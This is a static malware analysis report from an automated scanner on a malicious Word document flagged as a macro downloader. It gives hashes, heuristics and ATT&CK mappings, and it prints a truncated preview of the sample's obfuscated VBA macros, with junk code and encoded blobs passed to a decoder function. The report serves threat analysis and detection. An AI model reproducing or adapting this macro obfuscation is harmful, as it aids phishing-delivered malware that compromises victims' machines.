Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 ae4ba9c43203e0db…

MALICIOUS

Office (OLE)

259.5 KB Created: 2018-03-28 04:55:00 Authoring application: Microsoft Office Word First seen: 2020-01-07
MD5: ccb3baaef563d1763b6ef2950a7b9871 SHA-1: f50fd4a62dad21f833cd255c565d48832348872f SHA-256: ae4ba9c43203e0db863f9367f6e4d678fdf55df2bf41ea8a3a6c56cdd7c4776a
244 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing obfuscated VBA macros, indicated by multiple OLE_VBA_* heuristic firings and the presence of a macros.bas file. The AutoOpen macro and CreateObject calls suggest an attempt to execute code. The ClamAV detection and the nature of the heuristics point towards a downloader, likely delivered as a spearphishing attachment.

Heuristics 9

  • ClamAV: Doc.Malware.Emodldr-10025032-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Emodldr-10025032-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Excel 4.0 (XLM) macro sheet present medium OLE_XLM_AUTOOPEN
    Workbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 58893 bytes
SHA-256: 6466897a0d832a6464343d0ab69eb599021978e7b3874a30f0c0af882575ea32
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 25 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "djruDAADhuVoH"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "QTwXfIhZd"
Function BzHNshSC()
On Error Resume Next
Select Case KCEjdz
      Case 32213
         bSnKm = CStr(ZqwsqD + CStr(75768) - SEDKLP * 60696)
      Case 59937
         IRavvw = wNhdl
         jzDBl = Tan(65912 * FpIvX)
End Select
IwAuB = WaFBtl("55KADEAMwA5AGEAMAAzADAANAA3AGIAOQBlfV0j", 4, 31)
Select Case zfSmBh
      Case 92659
         itMfd = CStr(XucWKB + CStr(16403) - GHJdz * 48156)
      Case 82041
         IiXMw = jajvpo
         DrWHn = Tan(66957 * MmlVa)
End Select
Select Case uKhkG
      Case 47799
         TljuZV = CStr(iQwaHF + CStr(69942) - JjFVIK * 23762)
      Case 91861
         HOUNw = loRXH
         TKoTLB = Tan(24888 * RwcSJ)
End Select
FUafUUj = WaFBtl("r.2YQAxAGYAZgA3ADEAMQBjAYpiX1n", 4, 21)
Select Case wilQU
      Case 14378
         anKBfi = CStr(Nmphdp + CStr(79649) - QBzIz * 72045)
      Case 77324
         lBEvY = CBCzG
         XdSfST = Tan(94362 * HvpULZ)
End Select
Select Case QMJhzM
      Case 69974
         AwUcP = CStr(jUPmd + CStr(36020) - fMddc * 61240)
      Case 24215
         ZEaPuj = MuRRqI
         titwzZ = Tan(36281 * uLpKl)
End Select
JEpHRatSm = WaFBtl("bADQAZQBhAGIANAAxAGEANgBmADYAZgBmADgAYQAzADIAMwAzAGYAYQA5ADkANwA2ADIANwA5ADEAMwA0AGQAYwBmAGMAOQAyADIANABkADUAYwA1AGQANAAyAGEANwBlADAwC8QNC,", 2, 131)
Select Case jEVjXw
      Case 51642
         tNVkrI = CStr(UMcNs + CStr(38029) - jdimKD * 19455)
      Case 30038
         jzpfp = kSLLwo
         dNiJBZ = Tan(97517 * wsjlU)
End Select
Select Case uXTfk
      Case 88770
         ruwPD = CStr(KAmRP + CStr(95065) - stpzL * 59783)
      Case 64182
         SSFiGi = JSqPSS
         mtSHJ = Tan(59686 * pbqwuQ)
End Select
nwRKm = WaFBtl("Vjj0AYgBiAGUANQBlAGQAYwA2AGMANgBhAGIANgAwAGEANQA5ADUAMQBlADUAMQA0ADQAMQBjADcAZABmADEAMfWcKv", 5, 82)
Select Case hVUFM
      Case 65998
         bthwc = CStr(rTbAiw + CStr(71518) - viDVC * 98124)
      Case 54376
         OjMSjb = VJGkhL
         lKjCk = Tan(42571 * qUvfum)
End Select
Select Case FTSvuG
      Case 99528
         TiLnw = CStr(jfljt + CStr(67510) - FFwut * 68167)
      Case 80430
         TVJdQr = cPaks
         OlMWbG = Tan(43161 * qjZlMz)
End Select
VULAIn = WaFBtl("wdgA3ADEAYwBkrLiiG", 3, 11)
Select Case TAAXJ
      Case 79878
         NCKiS = CStr(CWGIqj + CStr(84426) - mYScT * 96053)
      Case 54641
         jrErqI = ZNisN
         KMsou = Tan(65808 * ZQufI)
End Select
Select Case wkSKaQ
      Case 54235
         WwLjFB = CStr(WiMaZ + CStr(48744) - sYIWTT * 82532)
      Case 6223
         VEozVz = fAzUnB
         Zlnzz = Tan(13640 * qOPIr)
End Select
UTmmpiXjlF = WaFBtl("GuvFmGUAYgA3AGIAZQAxADcANgA3ADgAYwA1ADIANwA5ADMAMgBiAGEAZQA2ADEANAA1AGYAYwAyAGUAZgBkAGEAZgAyADgAMABlAGUAZgAzADIANABkADQANgA3AGQAMgBkADcAZgBmADEAZABkAGIAYgA1AGUANwBkAGUANAA1ADEAOAA4ADMANQAJLGk", 6, 182)
Select Case CEzIET
      Case 11310
         cRDwYk = CStr(ZZECqN + CStr(66908) - jTrwci * 81518)
      Case 47984
         iDvbDq = TvUzU
         AbWjRo = Tan(20704 * BjTTR)
End Select
Select Case anZmJs
      Case 29136
         vsKXi = CStr(EQfFzh + CStr(19778) - wqoITj * 22167)
      Case 48996
         mcDHQv = nFVjol
         UPVtS = Tan(1792 * mvazoj)
End Select
tJVNfVUPFY = WaFBtl("nTA2ADQAMAA3AGYANwBiADkAMwA2ADkAZgBiADkAYQAxADEAZgA0ADYANAAwAGEAYgBkAGIAYQBjADQAYQBiAGMAYQA4ADIAOAA2AGQAOQBlAGIANQA2AGMAMQA0ADYAZgBiAGQAZABjAGIAYwA2ADIAZAA4ADkAZQBmADYAZgA3AGMAYgAzADcAYgA0ADgANwA5AGIAnsKQ1", 3, 198)
Select Case BYiGVJ
      Case 47123
         flnVwS = CStr(LdlNVT + CStr(86401) - nsYBzj * 55683)
      Case 14395
         MkljnZ = bwZjj
         zEOsj = Tan(92879 * aNiIa)
End Select
Select Case lGcEc
      Case 72129
         wMLVdu = CStr(tszGtK + CStr(39822) - flfYiA * 95866)
      Case 45503
    
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.